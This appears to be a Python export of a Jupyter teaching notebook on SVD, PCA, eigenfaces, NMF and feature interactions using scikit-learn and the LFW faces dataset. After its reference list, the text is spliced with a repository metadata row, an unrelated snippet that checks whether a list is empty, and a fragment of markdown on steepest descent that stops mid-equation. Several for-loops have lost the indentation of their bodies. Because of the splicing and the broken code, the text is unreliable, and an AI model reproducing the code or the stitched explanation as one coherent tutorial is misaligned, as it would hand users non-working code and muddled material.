# Let's build a geometric intuition behind SVD:
# *$A$ is a matrix that can be seen as a linear transformation. This transformation can be decomposed in three sub-transformations: 1. rotation, 2. re-scaling, 3. rotation. These three steps correspond to the three matrices $U$, $S$, and $V$.*
#
# **Every matrix is a linear transformation**
#
#
# + id="2EmgIXaW_G2q"
# Thanks to https://hadrienj.github.io/, I've adapted his version in order to deal with subplots.
def plotVectors(vecs, cols, alpha=1, ax = None):
    """Draw 2-D vectors as arrows anchored at the origin.

    Each entry of *vecs* is an (x, y) pair; *cols* supplies one colour per
    vector.  Draws on *ax*, or on the current axes when *ax* is None.
    """
    if ax is None:
        ax = plt.gca()
    # Grey reference axes through the origin, behind the arrows.
    ax.axvline(x=0, color='#A9A9A9', zorder=0)
    ax.axhline(y=0, color='#A9A9A9', zorder=0)
    for i, vec in enumerate(vecs):
        # [x_tail, y_tail, x_component, y_component] for quiver.
        arrow = np.concatenate([[0, 0], vec])
        ax.quiver([arrow[0]], [arrow[1]], [arrow[2]], [arrow[3]],
                  angles='xy', scale_units='xy', scale=1,
                  color=cols[i], alpha=alpha)
def matrixToPlot(matrix, vectorsCol=('#FF9A13', '#1190FF'), ax = None):
    """Visualise a 2x2 matrix as a linear transformation of the unit circle.

    Draws the image of the unit circle under *matrix* (green curve) plus
    the two transformed basis vectors (the columns of *matrix*).

    Parameters
    ----------
    matrix : (2, 2) array supporting ``matrix[i, j]`` indexing.
    vectorsCol : two colour specs for the transformed basis vectors.
        Fix: a tuple default replaces the original mutable list default
        (a shared-mutable-default hazard); callers index it the same way.
    ax : matplotlib Axes, or None for the current axes.
    """
    ax = ax or plt.gca()
    # Unit circle: y = sqrt(1 - x^2) gives the upper half; the lower half
    # is covered by the "negative" branch below.
    x = np.linspace(-1, 1, 10000)
    y = np.sqrt(1-(x**2))
    # Image of the circle under the linear map (positive and negative y branches).
    x1 = matrix[0,0]*x + matrix[0,1]*y
    y1 = matrix[1,0]*x + matrix[1,1]*y
    x1_neg = matrix[0,0]*x - matrix[0,1]*y
    y1_neg = matrix[1,0]*x - matrix[1,1]*y
    # Transformed basis vectors = the columns of the matrix.
    u1 = [matrix[0,0],matrix[1,0]]
    v1 = [matrix[0,1],matrix[1,1]]
    plotVectors([u1, v1],ax = ax, cols=[vectorsCol[0], vectorsCol[1]])
    ax.plot(x1, y1, 'g', alpha=0.5)
    ax.plot(x1_neg, y1_neg, 'g', alpha=0.5)
# + id="pWMNzywSATu_" colab={"base_uri": "https://localhost:8080/", "height": 318} outputId="fd173ca9-3a28-45a6-9323-2c57d04faf76"
# Example matrix A, shown as a transformation of the unit circle.
A = np.array([[3, 7], [5, 2]])
figure, axis = plt.subplots(1,2, subplot_kw= dict(aspect = "equal"), figsize = (10, 6))
matrixToPlot(np.array([[1, 0], [0, 1]]), ax = axis[0])
axis[0].grid()
axis[0].set_title("Unit Circle")
axis[0].set_xlim(-1.5, 1.5)
axis[0].set_ylim(-1.5, 1.5)
matrixToPlot(A, ax = axis[1])
axis[1].set_title("Unit circle transformed by A")
axis[1].grid()
axis[1].set_xlim(-8, 8)
axis[1].set_ylim(-8, 8);
# + id="gnYRT9LIBr5F" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="b6faf550-17b3-4d3c-f21c-b56b48941f47"
# Decompose A = U S V (numpy returns V already transposed).
U, S, V = np.linalg.svd(A)
U
# + id="Mb9phNWnBwEO" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="a78b90d4-7002-4648-a504-ae2fcb86dbaf"
S
# + id="WD0D7RTYBxAo" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="37478b4a-9edd-420b-d9fc-e140ea2ef50d"
V
# + id="Mqb-hdmHBw9z" colab={"base_uri": "https://localhost:8080/", "height": 282} outputId="3dea9a85-9a88-4578-bf83-43c2771e739b"
# The three sub-transformations of the SVD: rotate (V), scale (S), rotate (U).
figure, axis = plt.subplots(1,4, subplot_kw= dict(aspect = "equal"), figsize = (18, 12))
matrixToPlot(np.array([[1, 0], [0, 1]]), ax = axis[0])
axis[0].grid()
axis[0].set_title("Unit Circle")
axis[0].set_xlim(-1.5, 1.5)
axis[0].set_ylim(-1.5, 1.5)
matrixToPlot(V, ax = axis[1])
axis[1].set_title("First rotation (by V):")
axis[1].grid()
axis[1].set_xlim(-1.5, 1.5)
axis[1].set_ylim(-1.5, 1.5);
matrixToPlot(np.diag(S).dot(V), ax = axis[2])
axis[2].set_title("Scaling (S.dot(V)")
axis[2].grid()
axis[2].set_xlim(-9, 9)
axis[2].set_ylim(-9, 9);
matrixToPlot(U.dot(np.diag(S)).dot(V), ax = axis[3])
axis[3].set_title("Second Rotation (U.dot(S).dot(V))")
axis[3].grid()
axis[3].set_xlim(-8, 8)
axis[3].set_ylim(-8, 8);
# + [markdown] id="MRG2r-FvLGnT"
# ### Singular Values
# The singular values are sorted in descending order. They correspond to a new set of features (that are a linear combination of the original features) with the first feature explaining most of the variance. For instance from the last example we can visualize these new features. The major axis of the ellipse will be the first left singular vector ($u_1$) and its norm will be the first singular value ($\sigma_1$).
#
#
# + id="Bt1gLApKLS5L" colab={"base_uri": "https://localhost:8080/", "height": 378} outputId="8fd177d9-3ebe-4582-a5f1-01b8b4a29aa0"
# Scale the left singular vectors by their singular values.
u1 = [S[0]*U[0,0], S[0]*U[0,1]]
v1 = [S[1]*U[1,0], S[1]*U[1,1]]
plt.figure(figsize = (10, 6))
plotVectors([u1, v1], cols=['black', 'black'])
matrixToPlot(A)
plt.text(-5, -4, r"$\sigma_1u_1$", size=18)
plt.text(-4, 1, r"$\sigma_2u_2$", size=18)
plt.xlim(-8, 8)
plt.ylim(-8, 8)
plt.grid()
# + [markdown] id="5tQp9Qlp8A8y"
# They are the major ($\sigma_1u_1$) and minor ($\sigma_2u_2$) axes of the ellipse. We can see that the feature corresponding to this major axis is associated with more variance (the range of value on this axis is bigger than the other)
#
#
# Let's now take a look at a simple implementation of SVD with `sklearn`.
# ### Look at this face!
# + id="eURFZ4OsG4Zi"
import numpy as np
from sklearn.datasets import fetch_lfw_people
from matplotlib import pyplot as plt
from sklearn.decomposition import TruncatedSVD
from sklearn.ensemble import RandomForestClassifier
# + id="ClNt2GHqEPPO" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="d6ae6f09-d89c-4e13-d17f-dd9fd20165f6"
# Labeled Faces in the Wild, keeping only people with >= 60 images.
faces = fetch_lfw_people(min_faces_per_person= 60)
print(faces.target_names)
print(faces.images.shape)
# + id="MTrHObYNESMs"
# Flatten each 2-D image into a single feature row.
X, y = faces.images, faces.target
X_res = X.reshape(X.shape[0], X.shape[1]*X.shape[2])
# + id="HTadycUaEs8J" colab={"base_uri": "https://localhost:8080/", "height": 346} outputId="9aeadd14-8818-4d2c-b442-ef0c2fdb98e1"
#Example Image
plt.matshow(X[0], cmap = "gray");
# + id="dzQPfnVKFIYc" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="93a75f1e-6285-4f40-e5b3-975481de7527"
# Baseline: random forest on the raw pixels, scored out-of-bag.
rf_original = RandomForestClassifier(oob_score=True)
rf_original.fit(X_res,y)
rf_original.oob_score_ # https://en.wikipedia.org/wiki/Out-of-bag_error#:~:text=Out%2Dof%2Dbag%20(OOB,data%20samples%20used%20for%20training.
# + id="MT60Ae5i4LnS"
# Optimal number of components: sweep the truncated-SVD dimensionality and
# score each reduced representation with a fresh random forest.
n_comp = [i for i in range(1,100)]
oob_scores = []
for n in n_comp:
    svd = TruncatedSVD(n_components= n)
    X_reduced = svd.fit_transform(X_res)
    rf_reduced = RandomForestClassifier(oob_score=True)
    rf_reduced.fit(X_reduced, y)
    oob_scores.append(rf_reduced.oob_score_)
# + id="r8siWvEb6hOB" colab={"base_uri": "https://localhost:8080/", "height": 649} outputId="8fa403e3-5d2e-448a-d764-33a6597adad8"
plt.figure(figsize=(15,10))
plt.title('The optimal number of components', fontsize=20, fontweight='bold')
plt.xlabel('Number of components n', fontsize=15)
plt.ylabel('Out-of-bag score', fontsize=15)
plt.grid()
plt.plot(n_comp, oob_scores)
# + id="1o8sWnJe44jf" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="c3143337-6214-4ddf-ffda-bb740739b915"
# Pick the component count with the highest out-of-bag score.
best_n_comp = n_comp[oob_scores.index(max(oob_scores))]
# Bug fix: this reports SVD components, not KNN neighbors (the message was
# copy-pasted from the KNN section earlier in the notebook).
print("Optimal number of components: " + str(best_n_comp))
# + id="0gREGLzC6s63" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="7103040e-db08-4d9e-e540-101ae936712c"
# Refit with the winning component count and re-score.
svd = TruncatedSVD(n_components= best_n_comp)
X_reduced = svd.fit_transform(X_res)
rf_reduced = RandomForestClassifier(oob_score=True)
rf_reduced.fit(X_reduced, y)
rf_reduced.oob_score_
# + id="oerLYaS3eDmX" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="0b805501-8f92-4b80-8baf-e1848ed09f73"
# Fraction of the total variance retained by the kept components.
svd.explained_variance_ratio_.sum()
# + id="rEJeXk0IHzxD" colab={"base_uri": "https://localhost:8080/", "height": 319} outputId="b4fda06e-98d4-469b-f945-682737a4b906"
# Original image (left) vs its reconstruction from the reduced space (right).
figure, axis = plt.subplots(1,2, subplot_kw= dict(aspect = "equal"), figsize = (8, 5))
image_reduced = svd.inverse_transform(X_reduced[0].reshape(1,-1))
image_reduced = image_reduced.reshape(faces.images.shape[1], faces.images.shape[2])
axis[0].matshow(X[0], cmap = "gray")
axis[1].matshow(image_reduced, cmap = "gray");
# + [markdown] id="xT6b3PLoaLpJ"
# ## PCA
# Principal component analysis (PCA) is a technique that is useful for the compression and classification of data. The purpose is to reduce the dimensionality of a data set (sample) by finding a new set of variables, smaller than the original set of variables, that nonetheless retains most of the sample's information.
#
# By information we mean the variation present in the sample,
# given by the correlations between the original variables. The new
# variables, called principal components (PCs), are uncorrelated, and are ordered by the fraction of the total information each retains
#
# + id="7aY_GKCvx8vX"
import numpy as np
import matplotlib.pyplot as plt
# + id="w0ATLMLsx85E"
# 10k samples from a strongly correlated 2-D Gaussian (rho = 0.8).
mean = np.array([1, 10])
cov = np.array([[1, 0.8 ],[0.8, 1]])
data = np.random.multivariate_normal(mean, cov, 10000)
X, y = data[:,0], data[:,1]
# + id="aD5W6qJxzW9u" colab={"base_uri": "https://localhost:8080/", "height": 540} outputId="9c638bb4-a111-4a58-ab6e-9beb4db11377"
plt.figure(figsize = (12, 8))
plt.scatter(X,y)
plt.grid()
plt.title('PCA Example', fontsize=20, fontweight='bold')
plt.xlabel('X', fontsize=15)
plt.ylabel('y', fontsize=15)
# + id="tBq6iNYu0oVW" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="2499ad7c-43e9-4815-d40c-f9de9d7ea97f"
# Full-rank PCA (2 components in 2-D) just rotates to the principal axes.
from sklearn.decomposition import PCA
pca = PCA(n_components = 2)
pca.fit(data)
# + id="FVy6Tcfc1KFG" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="9a12592a-be26-4b81-96d0-8c6b533648cb"
print(pca.components_)
# + id="yt8Y9Dp_1O9k" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="fe8f9535-4b7e-4652-caa8-1f50f038fb0a"
print(pca.explained_variance_)
# + id="bpBIOU2l1VcH" colab={"base_uri": "https://localhost:8080/", "height": 523} outputId="bce99867-1783-465f-a21c-4fe76223ef3f"
# adapt plotVectors
def draw_vector(v0, v1, ax=None):
    """Draw an arrow from point *v0* to point *v1* on *ax* (or the current axes)."""
    if ax is None:
        ax = plt.gca()
    # Empty text: we only want the arrow annotation itself.
    style = {'arrowstyle': '->', 'linewidth': 2, 'shrinkA': 0, 'shrinkB': 0}
    ax.annotate('', v1, v0, arrowprops=style)
# plot data with the principal axes overlaid; each arrow's length is
# proportional to the standard deviation along that component.
plt.figure(figsize = (12,8))
plt.scatter(X, y, alpha=0.2)
for length, vector in zip(pca.explained_variance_, pca.components_):
    v = vector * 3 * np.sqrt(length)
    draw_vector(pca.mean_, pca.mean_ + v)
plt.axis('equal')
plt.title('PCA Example', fontsize=20, fontweight='bold')
plt.xlabel('X', fontsize=15)
plt.ylabel('y', fontsize=15)
plt.grid();
# + [markdown] id="AJWnewOM22xd"
# These vectors represent the principal axes of the data, and the length of the vector is an indication of how "important" that axis is in describing the distribution of the data—more precisely, it is a measure of the variance of the data when projected onto that axis. The projection of each data point onto the principal axes are the "principal components" of the data.
#
# ### Dimensionality Reduction
# + id="WZYME8ij26rQ" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="7c9391e8-4217-4c09-8410-bb1b39e67177"
# Keep only the first principal component: 2-D -> 1-D.
pca = PCA(n_components=1)
pca.fit(data)
data_pca = pca.transform(data)
print("original shape: ", data.shape)
print("transformed shape:", data_pca.shape)
# + id="Uq7Hskow3Bo2" colab={"base_uri": "https://localhost:8080/", "height": 483} outputId="797f1e12-70f6-482b-b321-7c8968a61e1d"
# Project back to 2-D: the reconstruction collapses onto the first axis.
data_new = pca.inverse_transform(data_pca)
plt.figure(figsize = (12,8))
plt.scatter(X, y, alpha=0.2)
plt.scatter(data_new[:, 0], data_new[:, 1], alpha=0.8)
plt.axis('equal')
plt.grid();
# + [markdown] id="Ouea5Znpx9bZ"
# ### Have you already heard about Eigenfaces?
# + id="dAeby7rTkVHU" colab={"base_uri": "https://localhost:8080/", "height": 136} outputId="de016358-77c5-43bf-eaae-8f5b36cb3ef3"
from sklearn.datasets import fetch_lfw_people
faces = fetch_lfw_people(min_faces_per_person= 60)
print(faces.target_names)
print(faces.images.shape)
# + id="HNsSGfDLkmvY" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="75f2cf03-99a8-4d17-c8ab-3ea52670ef7f"
from sklearn.decomposition import PCA
pca = PCA(n_components = 200)
pca.fit(faces.data)
# + id="pMuXvV8iknaL" colab={"base_uri": "https://localhost:8080/", "height": 252} outputId="d6352564-e35c-443e-f942-d085631b48d1"
fig, axes = plt.subplots(3, 8, figsize=(9, 4),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(pca.components_[i].reshape(62, 47), cmap='binary_r')
# + id="5CxrZGukknjF" colab={"base_uri": "https://localhost:8080/", "height": 283} outputId="8b6bb233-8e06-4bd2-fee4-1533297075f4"
plt.plot(np.cumsum(pca.explained_variance_ratio_))
plt.xlabel('number of components')
plt.ylabel('cumulative explained variance')
plt.grid();
# + [markdown] id="VLN14Ll-nfAi"
# Awesome, let's now try to reconstruct the images using the new reduced dataset. In other words, we transformed the 62x47 pixel images into 1x200 images. Now to visualize how these images look we need to inverse transform the 1x200 images back to 64x64 dimension. Note that we're not reverting back to the original data, we're simply going back to the actual dimension of the original images so we can visualize them.
# + id="DzliZA2FlACH"
components = pca.transform(faces.data)
projected = pca.inverse_transform(components)
# + id="Y3czOmtNlF6c" colab={"base_uri": "https://localhost:8080/", "height": 171} outputId="23476fd7-3152-4154-ab8d-f0d0ea001965"
# Plot the results
fig, ax = plt.subplots(2, 10, figsize=(10, 2.5),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i in range(10):
ax[0, i].imshow(faces.data[i].reshape(62, 47), cmap='binary_r')
ax[1, i].imshow(projected[i].reshape(62, 47), cmap='binary_r')
ax[0, 0].set_ylabel('full-dim\ninput')
ax[1, 0].set_ylabel('200-dim\nreconstruction');
# + [markdown] id="UkGYlL3ylUUH"
# https://jakevdp.github.io/PythonDataScienceHandbook/05.09-principal-component-analysis.html
# + [markdown] id="V5QwB4OBnEy4"
# ### Let's see what happens with a out-of-the-dataset face!
# + id="D-46gZ-oaNXL" colab={"base_uri": "https://localhost:8080/", "height": 224} outputId="f0481fc8-1646-46cf-b3b3-5890c4d7f9f9"
# !wget https://raw.githubusercontent.com/MLJCUnito/ProjectX2020/master/HowToTackleAMLCompetition/img/Lecture7/FaceLec7.jpg
# + id="h5rdX7ckafaK"
from skimage.transform import resize
from skimage.color import rgb2gray
import imageio
source_image = imageio.imread("FaceLec7.jpg")
source_image_res = resize(source_image, (62, 47))[..., :3] #mnist-like size
source_image_res = rgb2gray(source_image_res)
# + [markdown] id="u9T2TBpJfDLS"
# courtesy from https://thispersondoesnotexist.com/
# + id="z0Q2DO2JbLx2" colab={"base_uri": "https://localhost:8080/", "height": 334} outputId="bfa03d55-965c-41bd-e980-ad6ff7ea90f2"
figure, axis = plt.subplots(1,2, subplot_kw= dict(aspect = "equal"), figsize = (8, 5))
axis[0].imshow(source_image)
axis[1].imshow(source_image_res, cmap = "binary_r")
# + id="MvjlqgJRcPpw"
# Project the out-of-dataset face into the fitted PCA space (200 components,
# not 2 as a previous note said) and reconstruct it for comparison.
component_source_img = pca.transform(source_image_res.reshape(1, -1))
projected_source_img = pca.inverse_transform(component_source_img)
# + id="bSbui8tPlyfA" colab={"base_uri": "https://localhost:8080/", "height": 234} outputId="42f3026a-c4ab-4d97-9127-9e7328a18251"
# Plot the results
fig, ax = plt.subplots(1, 2, figsize=(6, 4),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.4))
ax[0].imshow(source_image_res, cmap='binary_r')
ax[1].imshow(projected_source_img.reshape(62, 47), cmap='binary_r')
ax[0].set_title('full-dim input')
ax[1].set_title('200-dim reconstruction');
# + [markdown] id="y6rXgv7Ln_M-"
# What is going on here?
# + [markdown] id="jDqtu1pzaNe6"
#
# ## NMF
#
# "*Is perception of the whole based on perception of its parts? There is psychological and physiological evidence for parts-based representations in the brain, and certain computational theories of object recognition rely on such representations. But little is known about how brains or computers might learn the parts of objects. Here we demonstrate an algorithm for non-negative matrix factorization that is able to learn parts of faces and semantic features of text. This is in contrast to other methods, such as principal components analysis and vector quantization, that learn holistic, not parts-based, representations*", D.D. Lee & H.S. Seung, Learning the parts of objects by non-negative matrix factorization
#
# Why and how NMF learns such a representation, completely different from the one from PCA? By describing these methods in a matrix factorization framework. Both methods try to re-construct a matrix $V$ by factorizing it in this way: $V \sim WH$.
#
# PCA constrains the columns of $W$ to be orthonormal and the
# rows of $H$ to be orthogonal to each other. This allows a distributed representation in which each face is approximated by a linear combination of all the basis images, or eigenfaces.
#
# NMF does not allow negative entries in the matrix factors $W$ and
# $H$. Only additive combinations are allowed, because the
# non-zero elements of $W$ and $H$ are all positive. In contrast to PCA, no subtractions can occur. For these reasons, the non-negativity
# constraints are compatible with the intuitive notion of combining
# parts to form a whole, which is how NMF learns a parts-based
# representation.
#
#
# https://www.kaggle.com/jinilcs/dimensionality-reduction-pca-nmf-t-sne
#
# + id="MfojjokmBb0x" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="67ab01d1-e1df-4b2f-da27-ef33aedb5b74"
from sklearn.decomposition import NMF
nmf = NMF(n_components = 100, random_state = 0)
nmf.fit(faces.data)
# + id="GhVqSdCpCFEf" colab={"base_uri": "https://localhost:8080/", "height": 252} outputId="be4a22a0-8630-4aea-aa95-9e78cb444428"
fig, axes = plt.subplots(3, 8, figsize=(9, 4),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(nmf.components_[i].reshape(62, 47), cmap='binary_r')
# + id="isbvUQ8-Gnrb"
# Getting a score for NMF, since there's no default explained_variance as in pca
from sklearn import metrics
def get_score(model, data, scorer=metrics.explained_variance_score):
    """Score how well ``model`` reconstructs ``data``.

    The data is projected into the model's latent space and back again;
    the reconstruction is then compared to the original with ``scorer``
    (explained variance by default).
    """
    reconstruction = model.inverse_transform(model.transform(data))
    return scorer(data, reconstruction)
# + id="JpmnPfhIGxv8" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="514b5b48-a27d-4695-ee96-ee553404de22"
print(get_score(nmf, faces.data))
# + id="fvGA1XbBHZYF" colab={"base_uri": "https://localhost:8080/", "height": 66, "referenced_widgets": ["8051a0e9c6c24958b39f18f806cde884", "eb9644f2bd6b4295a01f0d4d58298bcd", "9baad1efe5904c70ba02c4c04978d9b5", "1af4a135f4674919ac3bafcde2da9fdf", "4976911365d44452bf652162b157793f", "4157c9d55079482b8c5daedc056c1a6b", "e169d99e6030404189d66b951ffecf56", "3b649dad59964093bc2629240a8ae675"]} outputId="5c508172-e53a-4f65-bff0-1a193db452cf"
#it takes a while (around 30 mins on colab), be patient... else, you should reduce the number of components
"""from tqdm.notebook import tqdm
n_comp = [i for i in range(1, 100)]
nmf_scores = []
for n in tqdm(n_comp):
nmf = NMF(n_components= n, random_state = 0)
nmf.fit(faces.data)
nmf_scores.append(get_score(nmf, faces.data))"""
# 0.9 is around 100 components : you have been warned !! :)
# + id="BlOXnd_uIPuE" colab={"base_uri": "https://localhost:8080/", "height": 632} outputId="53748e67-fdca-45f4-99e7-51daaa2c03a7"
plt.figure(figsize=(15,10))
plt.title('The optimal number of components', fontsize=20, fontweight='bold')
plt.xlabel('Number of components n', fontsize=15)
plt.ylabel('Score', fontsize=15)
plt.grid()
plt.plot(n_comp, nmf_scores)
"""plt.savefig("nmf_optimal_comp.png")
from google.colab import files
files.download("nmf_optimal_comp.png")"""
# + id="DlVd58NaRq0T" colab={"base_uri": "https://localhost:8080/", "height": 487} outputId="5d70fea8-8410-4bfc-b4a7-a2366778880b"
from sklearn.decomposition import PCA
pca = PCA(n_components = 100)
pca.fit(faces.data)
nmf = NMF(n_components = 100)
nmf.fit(faces.data)
fig, axes = plt.subplots(3, 8, figsize=(9, 4),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(pca.components_[i].reshape(62, 47), cmap='gray')
fig, axes = plt.subplots(3, 8, figsize=(9, 4),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(nmf.components_[i].reshape(62, 47), cmap='gray')
# + id="J3c0bEpEVq4G" colab={"base_uri": "https://localhost:8080/", "height": 385} outputId="74d04e2f-4ec9-43fb-8139-c06ab29036be"
# A little trick
combined_data = np.array([pca.components_[0], nmf.components_[1]])
#Get the min and max of all your data
_min, _max = np.amin(combined_data), np.amax(combined_data)
# Plot the results
fig, ax = plt.subplots(1, 2, figsize=(10, 8),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
ax[0].imshow(pca.components_[0].reshape(62, 47), cmap='coolwarm', vmin = _min, vmax = _max)
ax[1].imshow(nmf.components_[0].reshape(62, 47), cmap='coolwarm', vmin = _min, vmax = _max)
ax[0].set_ylabel('PCA - 100 components')
ax[1].set_ylabel('NMF - 100 components');
# + [markdown] id="R3Tlr0-2G4u1"
# ## Feature Interactions
#
# *When features interact with each other in a prediction model, the prediction cannot be expressed as the sum of the feature effects, because the effect of one feature depends on the value of the other feature. Aristotle's predicate "The whole is greater than the sum of its parts" applies in the presence of interactions.* Christoph Molnar, Interpretable Machine Learning
#
# A first introduction (thanks to Chris Albon)
# https://chrisalbon.com/machine_learning/linear_regression/adding_interaction_terms/
#
# $\hat{y} = \hat{\beta_0} + \hat{\beta_{1}}x_{1}+ \hat{\beta_{2}}x_{2} + \hat{\beta_{3}}x_{1}x_{2} + \epsilon$
#
# Patsy: https://medium.com/@mummertm/using-patsy-for-statistical-modeling-189a9d9f5d27 ;
#
# https://stats.stackexchange.com/questions/105543/how-to-prepare-interactions-of-categorical-variables-in-scikit-learn
#
# + id="JapCvFlwcffF"
# Load libraries
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
import pandas as pd
# + id="tOrkvv7hc5l8" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="6a7d0a30-14b2-4b78-a135-1183de54b882"
# !wget https://www.arpa.piemonte.it/export/sites/default/accesso-ai-dati/opendata/dati/GIARDINI-REALI.zip
# + id="3cQv4VnTdn5x" colab={"base_uri": "https://localhost:8080/", "height": 187} outputId="931ffe45-9f78-4f98-a032-07f1abc8877c"
# unzipping in the same directory, to specify a path add: -d "path"
# !unzip "GIARDINI-REALI.zip"
# + id="M1BugMpZeGb5"
header_list = ["Data", "Ora", "ID_Rete_Monitoraggio", "Codice_Istat_Comune",
"Progr_Punto_Com","Vel_Vento", "Dir_Vento", "Dev_Std_Vel_Trasversale",
"Press_Atmosferica", "Temp_Aria", "Umid_Relativa", "Rad_Solare_Diretta",
"Rad_Solare_Riflessa", "Precipitazione"]
arpa_data = pd.read_csv("MonthElb_012010_001272907.csv", error_bad_lines=False , sep= ";", names = header_list)
# + id="VnqBa0pae3Ge" colab={"base_uri": "https://localhost:8080/", "height": 224} outputId="02d829f1-86e2-463a-bae5-c6be50866e95"
arpa_data.head()
# + [markdown] id="h8PCNVsMchqI"
#
# ### Partial Dependence Plots
# https://scikit-learn.org/stable/modules/partial_dependence.html
#
#
# ### H-Statistics
#
# https://github.com/ralphhaygood/sklearn-gbmi/blob/master/example.ipynb
# + id="govXXwhBG6Zd" colab={"base_uri": "https://localhost:8080/", "height": 102} outputId="6e87006f-42f8-4fc2-cd32-fae350c50720"
# H-statistics
# !pip install sklearn-gbmi
# + [markdown] id="cJkYstQZG7Pj"
# ## Manifold Learning Methods: t-SNE, UMAP
# + id="OWyTnHJQG_Ml"
# + [markdown] id="8oyhHKuE9xmw"
# # References & Additional Material
#
# * https://www.kaggle.com/deepthiar/toydatasets : KNN Data, a nice Kaggle repo
#
# * http://rasbt.github.io/mlxtend/ : MLxtend library
#
# * https://splot.readthedocs.io/en/stable/users/tutorials/weights.html : PySal Docs
#
# * http://readiab.org/ Applied Bioinformatics in Python
#
# * https://en.wikipedia.org/wiki/Matrix_decomposition , Matrix Factorization techniques
#
# * http://web.ipac.caltech.edu/staff/fmasci/home/astro_refs/PrincipalComponentAnalysis.pdf: PCA
#
#
# * https://jakevdp.github.io/PythonDataScienceHandbook/ : Jake VanderPlas, Data Science Handbook
#
# * https://math.stackexchange.com/questions/3869/what-is-the-intuitive-relationship-between-svd-and-pca#:~:text=Singular%20value%20decomposition%20(SVD)%20and,never%20specify%20the%20exact%20relation : relationship between SVD and PCA
#
# * https://github.com/mtsang/interaction_interpretability Something more on interaction and interpretability (that's pretty difficult tho)
#
# * https://www.jmlr.org/papers/volume9/vandermaaten08a/vandermaaten08a.pdf : t-SNE Paper
#
# * https://lvdmaaten.github.io/tsne/ : t-SNE FAQ
#
#
| 40,319 |
/assign9_prog4.py-checkpoint.ipynb
|
a7c620f52dc879aebe743785f669863134f08d72
|
[] |
no_license
|
maheswarareddy024/assignment9-py
|
https://github.com/maheswarareddy024/assignment9-py
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 686 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Demonstrate the Pythonic truthiness check: an empty list is falsy,
# so `not a` is True exactly when the list has no elements.
a=[]
if not a:
    print ("List is empty")
else:
    print("List is not empty")
# The system we want to solve has the form
# $$Ax = b \tag{1}$$
# which is eqivalent to finding the stationary point of the quadratic function
# $$f(x) = \frac{1}{2}x^T A x - b^T x + c \tag{2}$$
#
# And the notations we are going to use is as follows
# - $A$ is a known, square, symmetric, positive-definite matrix.
# - $b$ is a known vector.
# - $x$ is the unknown vector.
# - $x_i$ is the estimated $x$ in the $i^{th}$ iteration and $x_0$ is the initial point.
# - $e_i = x-x_i$ is the error between the true $x$ and the estimated $x_i$. It indicates how far we are from the solution.
# - $\alpha_i d_i = (x_i - x_{i-1})$, where $d_i$ is the direction from $x_{i-1}$ to $x_i$.
# - $\alpha_i$ is the weight of the direction.
# - $r_i = b - Ax_{i} = Ax-Ax_i = Ae_i$ is the residual after the $i^{th}$ iteration. It indicates how far we are from the correct value of $b$.
#
# ----------------
#
# # Steepest Descent
#
# Think of a bowl that is given by a quadratic function
#
# $$f(x) = \frac{1}{2}x^T A x - b^T x + c$$
#
# Our goal is to find the lowest point of this bowl.
#
# When first-order derivative of this function is zero, we obtain the solution.
#
# $$f'(x) = Ax - b = 0 \tag{3}$$
#
# However, in the case that the matrix $A$ is large, it's tough to solve this matrix inverse problem directly. Steepest descent is a method that finds the solution step by step. It can start at arbitary point. Then update the position with specific direction and step size.
#
# $$x_{k+1} = x_k - \alpha_k d_k \tag{4}$$
#
# where $\alpha_k$ is the step size and $d_k$ is the direction. The determination of step direction and size follows the rules below.
#
# ## Direction
# For approaching to the lowest point of the bowl iteratively, steepest descent chooses the direction which decreases most quickly at each point. The direction is denoted by
# $$d_k = -f'(x_k) = b - Ax_k = r_k \tag{5}$$
# which is the residual we mentioned in the beginning.
#
# ## Step size
#
# The method we use to determine the step size is called *line search*. It will chooses $\alpha$ to minimize $f$ along a line. <span style="background-color:#e0f0ff">Line search requires that the gradient at the next point should be orthogonal to current search direction.</span>
#
# There is an intuitive reason why we should expect these vectors to be orthogonal at the minimum. The slope of the parabola at any point along the search line is equal to the magnitude of the projection of the gradient onto the line. These projections represent the rate of the increase of $f$ as one traverses the line. $f$ is minimized where the projection is zero - where the gradient is orthogonal to the search line.
#
# We can obtain the best solution of $\alpha_k$ by setting the derivative of $f(x_{k+1})$ to zero.
#
# $$\frac{d}{d\alpha_k}f(x_{k+1}) = f'(x_{k+1})^T\frac{d x_{k+1}}{d \alpha_k} = r_{k+1}^Tr_{k}=0 \tag{6}$$
#
# To determine $\alpha$, we use the expression of $r_{k}$ to denote the vector $r_{k+1}$
#
# $$\begin{align*}
